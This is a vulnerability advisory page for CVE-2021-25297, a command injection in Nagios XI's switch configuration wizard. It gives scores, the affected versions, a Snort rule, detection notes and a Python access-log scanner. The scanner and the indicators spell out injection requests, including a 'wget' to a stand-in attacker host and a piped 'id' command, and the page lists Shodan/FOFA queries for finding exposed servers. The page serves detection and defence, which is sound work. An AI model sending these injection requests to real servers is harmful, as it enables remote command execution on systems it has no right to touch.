CVE-2021-25297
published 2021-02-15


Priority: P189 (high)
CVSS 3.1: 8.8 (high), vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Flags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2022-02-01
Exploited in the wild
EPSS: 42.94% (98.6th percentile)
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php, which fails to sanitize authenticated user-controlled input; a single HTTP request from an authenticated user can therefore lead to OS command injection on the Nagios XI server.

Affected (1 range)

Vendor   Product     Version range    Fixed in
nagios   nagios_xi   5.5.6 – 5.7.5    -

Detection & IOCs (extracted from sources)

path: /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php
url: /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on
path: /nagiosxi/config/monitoringwizard.php
snort: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Exploit traffic is a GET request to /nagiosxi/config/monitoringwizard.php with the 'ip_address' parameter containing a URL-encoded semicolon (%3b / 0x3b) used to inject OS commands after the IP address value.
  • The Nuclei template confirms exploitation by checking for an out-of-band DNS interaction (interactsh) AND the presence of 'Ping' and 'Switch Details' in the HTTP response body, with a 200 status code.
  • The wizard parameter is set to 'switch' and nextstep=3 in the injection request; defenders should alert on these specific query-string values combined with shell metacharacters in ip_address.
  • Shodan/FOFA queries can be used to identify exposed Nagios XI instances as potential targets: title:"Nagios XI", http.title:"nagios xi", title="nagios xi", app="nagios-xi".
  • Successful exploitation results in command execution as the 'apache' user on the Nagios XI server.
  • The vulnerability affects Nagios XI versions 5.5.6 through 5.7.5 only; versions outside this range are not affected by this specific injection path.
  • Exploitation requires valid Nagios XI credentials; this is an authenticated vulnerability, not an unauthenticated one.
  • The same Metasploit module also covers CVE-2021-25296 (windowswmi wizard) and CVE-2021-25298 (cloud-vm wizard). Snort rule SID 2034993 names CVE-2021-25297 and CVE-2021-25298 in its msg field, but its reference fields cite CVE-2021-25296 and CVE-2021-25297, so check the rule's own metadata rather than the msg text when mapping alerts back to a CVE.
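The detection points above (wizard path, wizard=switch, shell metacharacters in ip_address, the ET rule's semicolon-within-30-bytes check) can be turned into a log scanner. The following is an added example written for this page, not code from the sources, Nagios or Emerging Threats; the access-log lines, client addresses and the attacker.example host are constructed for the demo. It applies two checks side by side: an approximation of SID 2034993 as written, and an allowlist check that only accepts an ip_address value that actually parses as an IP address. The third sample line shows why the allowlist matters: a pipe instead of a semicolon is still not an IP address, yet the ET rule only looks for 0x3b.

```python
import re
from ipaddress import ip_address as parse_ip
from urllib.parse import parse_qs, unquote, urlsplit

WIZARD_PATH = "/nagiosxi/config/monitoringwizard.php"
# Characters that terminate or chain a shell command; a real IP never contains them.
SHELL_META = set(';|&`$(){}<>\n"\'\\')

# Apache combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines (not captured traffic). Line 2 mirrors the Nuclei
# request shape from this page; line 3 swaps the ';' for a '|' to show the gap.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jan/2022:10:00:01 +0000] "GET /nagiosxi/config/monitoringwizard.php?update=1&nsp=abc123&nextstep=3&wizard=switch&ip_address=10.0.0.20&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Jan/2022:10:00:07 +0000] "GET /nagiosxi/config/monitoringwizard.php?update=1&nsp=abc123&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20http://attacker.example/x%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1" 200 5120 "-" "curl/7.68.0"
10.0.0.9 - - [27/Jan/2022:10:00:09 +0000] "GET /nagiosxi/config/monitoringwizard.php?update=1&nsp=abc123&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%7c%20id%20%23&snmpopts%5bsnmpcommunity%5d=public HTTP/1.1" 200 5120 "-" "curl/7.68.0"
10.0.0.5 - - [27/Jan/2022:10:00:12 +0000] "GET /nagiosxi/index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def matches_et_rule(method, target):
    """Approximates ET SID 2034993: GET, the wizard path with a query string,
    then a ';' within 30 bytes after 'ip_address=' in the percent-decoded URI
    (Suricata's http.uri buffer is the normalized, decoded URI)."""
    if method != "GET":
        return False
    uri = unquote(target)
    if "nagiosxi/config/monitoringwizard.php?" not in uri:
        return False
    idx = uri.find("ip_address=")
    if idx < 0:
        return False
    start = idx + len("ip_address=")
    return ";" in uri[start:start + 30]


def analyze_request(method, target):
    """Allowlist check: on the switch wizard, ip_address must parse as an IP.
    Returns a reason string when the request looks like injection, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith(WIZARD_PATH):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("wizard", [""])[0] != "switch":
        return None
    for value in qs.get("ip_address", []):
        try:
            parse_ip(value)
            continue  # well-formed address, nothing to flag
        except ValueError:
            pass
        bad = sorted(SHELL_META.intersection(value))
        if bad:
            return f"shell metacharacters {bad} in ip_address={value!r}"
        return f"ip_address is not an IP address: {value!r}"
    return None


def scan_log(text):
    """Run both checks over access-log text; one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = analyze_request(m["method"], m["target"])
        if reason:
            findings.append({
                "src": m["src"],
                "ts": m["ts"],
                "status": m["status"],
                "reason": reason,
                "et_rule_hit": matches_et_rule(m["method"], m["target"]),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} status={f['status']} "
              f"et_rule={f['et_rule_hit']} {f['reason']}")
```

A 200 on the injected request is consistent with the Nuclei matcher (the wizard page still renders), so the status code alone does not separate success from failure; pair the log finding with the out-of-band indicator or with process telemetry for a shell spawned by the apache user.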

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      8.8     HIGH       CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0      9.0     HIGH       AV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck   -         8.8     HIGH
cisa        -         8.8     HIGH